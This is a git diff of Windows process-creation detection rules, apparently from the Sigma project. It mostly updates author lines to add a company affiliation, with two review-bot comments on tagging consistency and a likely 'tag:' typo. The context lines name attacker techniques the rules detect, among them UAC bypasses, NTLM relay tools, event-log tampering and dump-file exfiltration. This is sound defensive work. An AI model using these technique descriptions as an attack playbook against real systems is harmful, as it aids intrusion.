 - https://twitter.com/hackerfantastic/status/1616455335203438592?s=20
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2023/01/21
 logsource:
 category: process_creation
diff --git a/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml b/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml
index 60fa04649..6cbd2747c 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml
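Review bot: In the proc_creation_win_susp_win_server_undocumented_rce.yml hunk the new author line tags Florian Roth with `(Nextron Systems)` but leaves `Nasreddine Bencherchali` untagged, while single-author rules in this same commit (e.g. proc_creation_win_susp_schtasks_schedule_type_system.yml) do tag him. If the affiliation is meant to follow the person, the co-authored line should read `author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)`; if leaving co-authors untagged is deliberate, a sentence in the PR description saying so would stop the next editor from "fixing" it. The same split shows up in the wmic_proc_create, system_exe_anomaly, nircmd and nsudo hunks below.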
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration
 references:
 - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/04
 modified: 2022/06/17
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml
index 6fdd6bfe8..4b17df4e4 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a suspicious winrar execution in a folder which is not the default installation folder
 references:
 - https://twitter.com/cyb3rops/status/1460978167628406785
-author: Florian Roth, Tigzy
+author: Florian Roth (Nextron Systems), Tigzy
 date: 2021/11/17
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml
index 4a6501fc5..030dd9ae8 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml
@@ -5,7 +5,7 @@ description: Detects WMIC executions in which a event consumer gets created in o
 references:
 - https://twitter.com/johnlatwc/status/1408062131321270282?s=12
 - https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/06/25
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml
index 33525206a..f1ed5c2dd 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_execution.yml
@@ -6,7 +6,7 @@ references:
 - https://digital-forensics.sans.org/blog/2010/06/04/wmic-draft/
 - https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1
 - https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/
-author: Michael Haag, Florian Roth, juju4, oscd.community
+author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
 date: 2019/01/16
 modified: 2022/08/29
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml
index 2fffbd952..a3eb96a6d 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create.yml
@@ -5,7 +5,7 @@ description: Detects WMIC executing "process call create" with suspicious calls
 references:
 - https://thedfirreport.com/2020/10/08/ryuks-return/
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2020/10/12
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml b/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml
index a3697107a..f88d67421 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags
 references:
 - https://redcanary.com/blog/blackbyte-ransomware/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/02/26
 modified: 2022/05/13
 logsource:
diff --git a/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml b/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml
index 1bf0f90c8..aba0b3254 100644
--- a/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml
+++ b/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects usage of Sysinternals PsService for service reconnaissance or tamper
 references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/psservice
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/06/16
 tags:
 - attack.discovery
diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml
index 2a47070a7..d6f4e6e9c 100644
--- a/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml
+++ b/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the use of SharpEvtHook, a tool to tamper with Windows event logs
 references:
 - https://github.com/bats3c/EvtMute
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/07
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml b/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml
index 89b23fde0..abf5273b0 100644
--- a/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml
+++ b/rules/windows/process_creation/proc_creation_win_sysmon_exploitation.yml
@@ -6,7 +6,7 @@ references:
 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120
 - https://twitter.com/filip_dragovic/status/1590052248260055041
 - https://twitter.com/filip_dragovic/status/1590104354727436290
-author: Florian Roth, Tim Shelton (fp werfault)
+author: Florian Roth (Nextron Systems), Tim Shelton (fp werfault)
 date: 2022/11/10
 modified: 2022/12/30
 tag:
diff --git a/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml b/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml
index d5d4ac134..d18244076 100644
--- a/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml
+++ b/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml
@@ -8,7 +8,7 @@ description: Detects UAC bypass method using Windows event viewer
 references:
 - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
 - https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/19
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_sysnative.yml b/rules/windows/process_creation/proc_creation_win_sysnative.yml
index 947f1a7cc..30acf4a3d 100644
--- a/rules/windows/process_creation/proc_creation_win_sysnative.yml
+++ b/rules/windows/process_creation/proc_creation_win_sysnative.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
 references:
 - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/08/23
 tags:
 - attack.t1055
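Review bot: The trailing context line `tag:` in the proc_creation_win_sysmon_exploitation.yml hunk looks like a typo for `tags:`; every other rule in this diff closes the same block with `tags:`, and under a `tag` key the ATT&CK entries that presumably follow would not be read by tooling that looks for `tags`. This commit only touches the author line, so the key is pre-existing rather than introduced here, but it is a one-character fix worth folding into the same pass: `tags:`. The lines below `tag:` are outside the hunk, so please confirm they are the usual `- attack.*` list before renaming.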
diff --git a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
index d8694c9c0..c40e86963 100644
--- a/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
+++ b/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml
@@ -5,7 +5,7 @@ description: Detects a Windows program executable started from a suspicious fold
 references:
 - https://twitter.com/GelosSnake/status/934900723426439170
 - https://asec.ahnlab.com/en/39828/
-author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
 date: 2017/11/27
 modified: 2023/01/10
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml b/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml
index dbf1748d7..09647dbfb 100644
--- a/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml
+++ b/rules/windows/process_creation/proc_creation_win_tamper_defender_remove_mppreference.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet
 references:
 - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/05
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml b/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml
index fb5d4e3f2..18293b29f 100644
--- a/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml
+++ b/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
 references:
 - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/05/22
 modified: 2023/01/25
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml b/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml
index b9162caf8..0bfffb9ed 100644
--- a/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml
+++ b/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml
@@ -6,7 +6,7 @@ references:
 - https://www.nirsoft.net/utils/nircmd.html
 - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
 - https://www.nirsoft.net/utils/nircmd2.html#using
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2022/01/24
 modified: 2022/11/30
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml b/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml
index 38e7f2a40..1fec8f538 100644
--- a/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml
@@ -6,7 +6,7 @@ references:
 - https://www.nirsoft.net/utils/nircmd.html
 - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
 - https://www.nirsoft.net/utils/nircmd2.html#using
-author: 'Florian Roth, Nasreddine Bencherchali @nas_bench'
+author: 'Florian Roth (Nextron Systems), Nasreddine Bencherchali @nas_bench'
 date: 2022/01/24
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml b/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml
index ab0472a4f..276b58586 100644
--- a/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml
+++ b/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml
@@ -5,7 +5,7 @@ description: Detects the use of NSudo tool for command execution
 references:
 - https://nsudo.m2team.org/en-us/
 - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
-author: Florian Roth, Nasreddine Bencherchali
+author: Florian Roth (Nextron Systems), Nasreddine Bencherchali
 date: 2022/01/24
 modified: 2022/11/18
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml b/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml
index 9d0d56d4f..9d3099b36 100644
--- a/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml
+++ b/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml
@@ -5,7 +5,7 @@ description: Detects the use of RunXCmd tool for command execution
 references:
 - https://www.d7xtech.com/free-software/runx/
 - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/01/24
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml b/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml
index 1fe21b0ba..416e4d49b 100644
--- a/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml
+++ b/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml
@@ -9,7 +9,7 @@ references:
 - https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes
 - https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
 - https://www.localpotato.com/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/24
 modified: 2023/01/12
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml b/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml
index 04a83dcbb..4dfe578e0 100644
--- a/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml
+++ b/rules/windows/process_creation/proc_creation_win_tools_uac_bypass_computerdefaults.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/31
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml b/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml
index 4cd1b2a77..ea7421f86 100644
--- a/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml
+++ b/rules/windows/process_creation/proc_creation_win_turn_on_dev_features.yml
@@ -8,7 +8,7 @@ description: Detects when a user enable developer features such as "Developer Mo
 references:
 - Internal Research
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/11
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml
index 403f458c6..23e9805b0 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml
@@ -6,7 +6,7 @@ references:
 - https://mattharr0ey.medium.com/privilege-escalation-uac-bypass-in-changepk-c40b92818d1b
 - https://github.com/hfiref0x/UACME
 - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml
index 996a7be80..36a16b002 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml
index c2fd21940..33b8c6454 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml
index 8c6f655a7..be3f6eb6e 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml
index ad66ff325..3113412c5 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml
@@ -8,7 +8,7 @@ description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
 references:
 - https://twitter.com/orange_8361/status/1518970259868626944
 - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/11/22
 tags:
 - attack.defense_evasion
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
index 8ac38202b..36a3e2749 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
 references:
 - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/13
 modified: 2022/09/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml
index 16db3f2b4..002eda801 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
 references:
 - https://github.com/Wh04m1001/IDiagnosticProfileUAC
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/03
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml
index f05355a62..dbf495ec2 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml
index cc833b1cb..1044386ef 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml
index 5168dac7f..e343b0369 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml
index 8969c1e7b..54f19503c 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml
index 31b9b9b11..4c5a55613 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml
index 90998f3f6..4e59df648 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
 references:
 - https://github.com/hfiref0x/UACME
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml b/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml
index fc048cf4e..bf66d4460 100644
--- a/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml
+++ b/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml
@@ -6,7 +6,7 @@ references:
 - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/
 - https://github.com/hfiref0x/UACME
 - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2021/08/23
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
index 8ac47c9a4..414290776 100644
--- a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
+++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml
@@ -8,7 +8,7 @@ description: Detects usage of the Get-ADUser cmdlet to collect user information
 references:
 - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
 - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/09/09
 modified: 2022/11/17
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml b/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml
index 19ee29656..827c6c797 100644
--- a/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml
+++ b/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml
@@ -10,7 +10,7 @@ description: Detects usage of the "Set-Service" powershell cmdlet to configure a
 references:
 - https://twitter.com/Alh4zr3d/status/1580925761996828672
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/17
 tags:
 - attack.persistence
diff --git a/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml b/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml
index 3cced3cf2..0552624be 100644
--- a/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml
+++ b/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml
@@ -5,7 +5,7 @@ description: Detects uncommon or suspicious child processes spawning from a VsCo
 references:
 - https://twitter.com/nas_bench/status/1618021838407495681
 - https://twitter.com/nas_bench/status/1618021415852335105
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2023/01/26
 tags:
 - attack.execution
diff --git a/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml b/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml
index baf6fbb3b..673b6005c 100644
--- a/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml
+++ b/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a JAVA process running with remote debugging allowing more than just localhost to connect
 references:
 - https://dzone.com/articles/remote-debugging-java-applications-with-jdwp
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/01/16
 modified: 2023/02/01
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml b/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml
index 1a188d5a9..da7a7abe1 100644
--- a/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml
+++ b/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml
@@ -6,7 +6,7 @@ references:
 - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime
 - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/12
 modified: 2022/09/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml b/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml
index f5720ce04..9af0a9a14 100644
--- a/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml
+++ b/rules/windows/process_creation/proc_creation_win_wab_unusual_parents.yml
@@ -6,7 +6,7 @@ references:
 - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/
 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime
 - https://thedfirreport.com/2022/09/26/bumblebee-round-two/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/12
 modified: 2022/09/27
 tags:
diff --git a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml b/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml
index 89d1ac20b..8bbd0d7de 100644
--- a/rules/windows/process_creation/proc_creation_win_weak_or_abused_passwords.yml
